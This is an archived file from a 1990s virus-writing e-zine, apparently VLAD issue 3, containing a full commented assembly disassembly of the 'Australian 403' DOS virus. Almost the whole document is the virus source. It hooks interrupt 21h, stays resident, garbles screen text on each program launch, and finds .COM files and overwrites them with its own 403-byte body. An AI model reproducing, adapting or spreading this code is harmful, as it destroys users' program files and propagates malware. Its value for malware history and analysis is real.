home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / MAGS.ZIP / VLAD#3.ZIP / ARTICLE.3_7 < prev    next >
Encoding:
Text File  |  1995-02-06  |  7.3 KB  |  168 lines
  1.  
  2. ;                             Darkman/VLAD
  3. ;                           Proudly Presents
  4. ;                    Disassembly of Australian 403
  5.  
  6.  
  7. aussie403    segment
  8.              assume  cs:aussie403,ds:aussie403,es:aussie403
  9.              org     100h                ; Origin of COM-file
  10.  
  11. code:
  12.              jmp     resident
  13. stackptr     dw      ?                   ; Stack pointer
  14. stackseg     dw      ?                   ; Stack segment
  15. accumulator  dw      ?                   ; Accumulator register
  16. message      db      00h,0dh,0ah         
  17.              db      'ScUD 1991!'        ; Message by the author
  18.              db      0dh,0ah
  19. stackbytes   db      41h dup(?)          ; Stack
  20. int21off     dw      ?                   ; Offset of interrupt 21h
  21. int21seg     dw      ?                   ; Segment of interrupt 21h
  22. filespec     db      '*.COM',00h         ; File specification
  23. filehandle   dw      ?                   ; File handle
  24.  
  25. dta:                                     ; Disk transfer area (DTA)
  26. drive        db      ?                   ; Drive letter
  27. searchtemp   db      0bh dup(?)          ; Search template
  28. reserved     db      09h dup (?)         ; Reserved
  29. fileattr     dw      ?                   ; File attribute
  30. filetime     db      ?                   ; File time
  31. filedate     dw      ?                   ; File date
  32. filesize     dd      ?                   ; Filesize
  33. filename     db      0dh dup (?)         ; Filename + extension
  34.  
  35. fill         db      04h dup (?)         ; Fill of virus
  36.  
  37. virusint21   proc    near                ; Interrupt 21h of Australian 403
  38.              mov     cs:stackptr,sp      ; Save stack pointer
  39.              mov     cs:stackseg,ss      ; Save stack segment
  40.              mov     cs:accumulator,ax   ; Save accumulator register
  41.              lea     sp,message          ; SP = offset of message
  42.              nop
  43.              add     sp,4eh
  44.  
  45.              mov     ax,cs
  46.              mov     ss,ax
  47.              mov     ax,cs:accumulator   ; Load accumulator register
  48.              cmp     ah,4bh              ; Load or execute a program?
  49.              je      service4b           ; Equal? Jump to service4b
  50.              jmp     virusexit
  51. service4b:
  52.              push    ax                  ; Save AX at stack
  53.              push    bx                  ; Save BX at stack
  54.              push    cx                  ; Save CX at stack
  55.              push    dx                  ; Save DX at stack
  56.              push    ds                  ; Save DS at stack
  57.              push    es                  ; Save ES at stack
  58.              push    si                  ; Save SI at stack
  59.              push    di                  ; Save DI at stack
  60.  
  61.              mov     ax,0b800h
  62.              mov     ds,ax               ; DS = text color screen segment
  63.              mov     bx,00h
  64. chkscreen:
  65.              mov     al,[bx]             ; Read from screen
  66.              cmp     al,'0'              ; Zero?
  67.              jne     fuckscreen          ; Not equal? Jump to fuckscreen
  68.              mov     al,'O'              ; Convert zeros to O's
  69. fuckscreen:
  70.              mov     [bx],al             ; Write to screen
  71.              inc     bx                  ; Increase BX
  72.              inc     bx                  ; Increase BX
  73.              cmp     bx,1000h            ; End of screen?
  74.              jne     chkscreen           ; Not equal? Jump to chkscreen
  75.  
  76.              mov     ax,cs
  77.              mov     ds,ax
  78.              lea     dx,dta              ; DX = offset of dta
  79.              mov     ah,1ah              ; Set disk transfer area
  80.              pushf                       ; Save flags at stack
  81.              call    dword ptr cs:int21off
  82.  
  83.              mov     ax,cs
  84.              mov     ds,ax
  85.              lea     dx,filespec         ; DX = offset of filespec
  86.              mov     cx,00h              ; Set file attribute
  87.              mov     ah,4eh              ; Find first matching file
  88.              pushf                       ; Save flags at stack
  89.              call    dword ptr cs:int21off
  90.              jc      infectexit          ; Error? Jump to infectexit
  91.  
  92.              cmp     word ptr [offset filesize],0193h
  93.              jne     infect              ; Not infected? Jump to infect
  94. findnext:
  95.              mov     ah,4fh              ; Find next matching file
  96.              pushf                       ; Save flags at stack
  97.              call    dword ptr cs:int21off
  98.              jc      infectexit          ; Error? Jump to infectexit
  99.  
  100.              cmp     word ptr [offset filesize],0193h
  101.              jne     infect              ; Not infected? Jump to infect
  102.              jmp     short findnext
  103. infect:
  104.              mov     ax,cs
  105.              mov     ds,ax
  106.              lea     dx,filename         ; DX = offset of filename
  107.              mov     ah,3ch              ; Create a file
  108.              mov     cx,00h              ; Set file attribute
  109.              pushf                       ; Save flags at stack
  110.              call    dword ptr cs:int21off
  111.              mov     filehandle,ax       ; Save file handle
  112.  
  113.              mov     ax,cs
  114.              mov     ds,ax
  115.              mov     bx,filehandle       ; Load file handle
  116.              mov     cx,(codeend-code)   ; Write 403 bytes
  117.              lea     dx,code             ; DX = offset of code
  118.              mov     ah,40h              ; Write to file
  119.              pushf                       ; Save flags at stack
  120.              call    dword ptr cs:int21off
  121.  
  122.              mov     bx,filehandle       ; Load file handle
  123.              mov     ah,3eh              ; Close file
  124.              pushf                       ; Save flags at stack
  125.              call    dword ptr cs:int21off
  126. infectexit:
  127.              pop     di                  ; Load DI from stack
  128.              pop     si                  ; Load SI from stack
  129.              pop     es                  ; Load ES from stack
  130.              pop     ds                  ; Load DS from stack
  131.              pop     dx                  ; Load DX from stack
  132.              pop     cx                  ; Load CX from stack
  133.              pop     bx                  ; Load BX from stack
  134.              pop     ax                  ; Load AX from stack
  135. virusexit:
  136.              mov     sp,cs:stackptr      ; Load stack pointer
  137.              mov     ax,cs:stackseg
  138.              mov     ss,ax               ; Load stack segment
  139.              mov     ax,cs:accumulator   ; Load accumulator register
  140.              jmp     dword ptr cs:int21off
  141.              endp
  142.  
  143. resident:
  144.              mov     ax,cs
  145.              mov     ds,ax
  146.              mov     es,ax
  147.              mov     ss,ax
  148.  
  149.              mov     ax,3521h            ; Get address of interrupt 21h
  150.              int     21h                 ; Do it!
  151.              mov     int21off,bx         ; Save offset of interrupt 21h
  152.              mov     int21seg,es         ; Save segment of interrupt 21h
  153.  
  154.              mov     ax,cs
  155.              mov     ds,ax
  156.              mov     ax,2521h            ; Set address of interrupt 21h
  157.              lea     dx,virusint21       ; DX = offset of virusint21
  158.              int     21h                 ; Do it!
  159.  
  160.              mov     dx,293h             ; Reserve 672 bytes of memory
  161.              int     27h                 ; Terminate but stay resident
  162. codeend:
  163.  
  164. aussie403    ends
  165. end          code
  166.  
  167.  
  168.